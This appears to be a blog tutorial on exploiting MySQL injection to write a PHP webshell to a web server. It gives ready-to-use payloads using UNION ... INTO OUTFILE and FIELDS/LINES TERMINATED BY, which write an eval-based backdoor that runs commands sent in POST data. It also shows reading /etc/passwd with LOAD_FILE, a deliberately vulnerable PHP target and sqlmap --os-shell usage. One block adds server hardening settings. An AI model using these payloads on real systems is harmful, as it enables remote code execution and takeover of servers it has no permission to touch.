MySQL injection: two ways to write a one-liner and get a webshell fast

Published on 2017-08-31


The technique requires all of the following:

  1. A database user with the FILE privilege (root has it; FILE is a global privilege, it cannot be limited to one database)
  2. magic_quotes_gpc off, so a single quote survives (the INTO OUTFILE path must be a quoted string literal; hex encoding works for the file content but not for the path)
  3. The absolute path of a directory under the web root (not needed for reading with LOAD_FILE, mandatory for writing)
  4. secure_file_priv not restricting writes: empty means anywhere the mysqld process can write, a directory value limits writes to that directory, NULL disables INTO OUTFILE and LOAD_FILE entirely (MySQL 5.7.6 and later ship a restrictive platform-specific default; older versions and MariaDB default to empty)
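The queries behind the four preconditions, as an added example that is not part of the original post: run as the database user the web application connects with, they tell you whether the write can succeed before you burn a payload, and they end with the server-side settings that close the hole. The host, user, database and path names are assumptions.

```sql
-- Added example (not from the original post). Names, hosts and paths are assumed.

-- 1. FILE privilege: global, stored in mysql.user, never per database.
--    Without it INTO OUTFILE fails with "Access denied; you need the FILE privilege".
SHOW GRANTS FOR CURRENT_USER();
SELECT grantee FROM information_schema.user_privileges
 WHERE privilege_type = 'FILE';

-- 4. secure_file_priv:  ''    -> write anywhere the mysqld process can write
--                       '/d'  -> only below /d (MySQL 5.7.6+ defaults to such a directory)
--                       NULL  -> INTO OUTFILE and LOAD_FILE() are disabled
--    The variable is not dynamic: SET GLOBAL fails, only my.cnf changes it.
SELECT @@secure_file_priv, @@version, @@datadir, @@basedir;

-- 3. The write needs an absolute path; reading does not. With FILE and a
--    permissive secure_file_priv, LOAD_FILE() returns the file, otherwise NULL.
SELECT LOAD_FILE('/etc/passwd');

-- What the injected payload boils down to once the checks pass. mysqld, not the
-- web server, creates the file: the directory must be writable by the mysqld
-- user and the file must not exist yet (INTO OUTFILE never overwrites).
SELECT '<?php phpinfo(); ?>' INTO OUTFILE '/home/wwwroot/lu4n.com/luan_phpinfo.php';

-- Closing it from the server side: an application user without FILE (least
-- privilege) and a restrictive secure_file_priv in my.cnf:
--   [mysqld]
--   secure_file_priv = NULL
-- (NULL disables file import/export entirely; a directory outside the web root
--  limits writes to that directory.)
CREATE USER 'webapp'@'localhost' IDENTIFIED BY 'changeme';
GRANT SELECT, INSERT, UPDATE, DELETE ON app.* TO 'webapp'@'localhost';
-- FILE is deliberately absent: a GRANT ... ON app.* cannot even express it.
```

If the first two queries show FILE and an empty secure_file_priv, the only thing left to find is the web root; if secure_file_priv is NULL, neither method on this page can work and it is time to look elsewhere.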

1. union

```
id=2) union select 1,2,3,4,5,6,7,'<? phpinfo(); ?>' into outfile '/home/wwwroot/lu4n.com/luan_phpinfo.php'%23
```

`<? phpinfo(); ?>` is the content written; replace it with your own one-liner (prefer `<?php ... ?>`, since the short `<?` tag only works when short_open_tag is enabled). `/home/wwwroot/lu4n.com/luan_phpinfo.php` is the file to create under an existing, web-served directory: the directory must be writable by the mysqld process and the file must not already exist, because INTO OUTFILE never overwrites. `%23` is a URL-encoded `#` that comments out the remainder of the original query.

2. no union

```
id=2) into outfile '/home/wwwroot/lu4n.com/luan_phpinfo.php' fields terminated by '<? phpinfo(); ?>'%23
```

I first saw the second method in a T00ls (吐司) post dated 2015-1-24; T00ls really does have a lot of skilled people.
The result looks like this:

The second method gets the shell written by supplying the one-liner as the field delimiter. MySQL only emits the FIELDS TERMINATED BY string between columns, so the query result must have at least two columns.
Most injection points meet that condition.
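The complete statements the application ends up executing for both payload shapes, as an added example that is not part of the original post; it also goes one step past the post with the variant that works on a single-column query. The table and its eight columns (news), the shell path and the POST parameter name are assumptions.

```sql
-- Added example (not from the original post). Table, columns, path and
-- parameter name are assumed.
-- Assumed vulnerable query:
--   SELECT id,title,body,author,created,views,flag,extra FROM news WHERE (id=$id)

-- 1. union: the shell is the last column of a fabricated row. "#" (sent as %23)
--    comments out the trailing ")". The OUTFILE path must be a quoted literal;
--    the content may be hex (0x3C3F706870 is "<?php") if quotes in it are
--    filtered. FIELDS ESCAPED BY '' stops mysqld from writing a backslash
--    before any tab or newline inside the shell, which would break the PHP.
SELECT id,title,body,author,created,views,flag,extra FROM news WHERE (id=2)
UNION SELECT 1,2,3,4,5,6,7,'<?php @eval($_POST["luan"]); ?>'
INTO OUTFILE '/home/wwwroot/lu4n.com/shell.php' FIELDS ESCAPED BY ''#)
-- File content: the real row, then
--   1<TAB>2<TAB>3<TAB>4<TAB>5<TAB>6<TAB>7<TAB><?php @eval($_POST["luan"]); ?>

-- 2. no union: the real row is written and the shell becomes the column
--    separator, so it appears between every pair of columns (7 copies for 8
--    columns) and never at all for a single-column query.
SELECT id,title,body,author,created,views,flag,extra FROM news WHERE (id=2)
INTO OUTFILE '/home/wwwroot/lu4n.com/shell.php'
FIELDS TERMINATED BY '<?php @eval($_POST["luan"]); ?>'#)

-- 3. single column: the row terminator is written after every row regardless
--    of column count. Assumed query: SELECT title FROM news WHERE (id=$id)
SELECT title FROM news WHERE (id=2)
INTO OUTFILE '/home/wwwroot/lu4n.com/shell.php'
LINES TERMINATED BY '<?php @eval($_POST["luan"]); ?>'#)

-- Every statement creates a new file; re-running against an existing path
-- fails with "File ... already exists", so change the name between attempts.
```

The union form is the cleanest output, the FIELDS TERMINATED BY form survives a "union" keyword filter like the one in the test target below, and the LINES TERMINATED BY form is the fallback when the injected query selects only one column.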

Using sqlmap

Taking luan_test.php as the example target:

```php
<?php
// Test target from the post: a root connection to the mysql schema, a
// case-insensitive "union" filter, and the user parameter concatenated
// straight into the query. Deliberately vulnerable; mysql_* needs PHP <= 5.6.
@$link = mysql_connect("localhost", "root", "");
mysql_select_db("mysql", $link);
$user = strtolower($_GET['user']);
if (strpos($user, "union") === false) {   // blocks the union method only
    $sql = "SELECT * FROM user where user='{$user}'";
    echo $sql . '<br>';
    mysql_query($sql);
    echo mysql_errno() . ": " . mysql_error() . " ";
}
?>
```

In my testing, the latest sqlmap does support this method:

```
C:\luan\sqlmap>python sqlmap.py -u "http://192.168.2.200/luan_test.php?user=root" --os-shell
```


But if --os-shell cannot be used, sqlmap's file-write option (--file-write together with --file-dest) did not succeed in my testing.

In other words, sqlmap can only upload its own webshell.

If you rely on tools and run into this situation, run sqlmap with --os-shell and then work through the webshell sqlmap uploads.

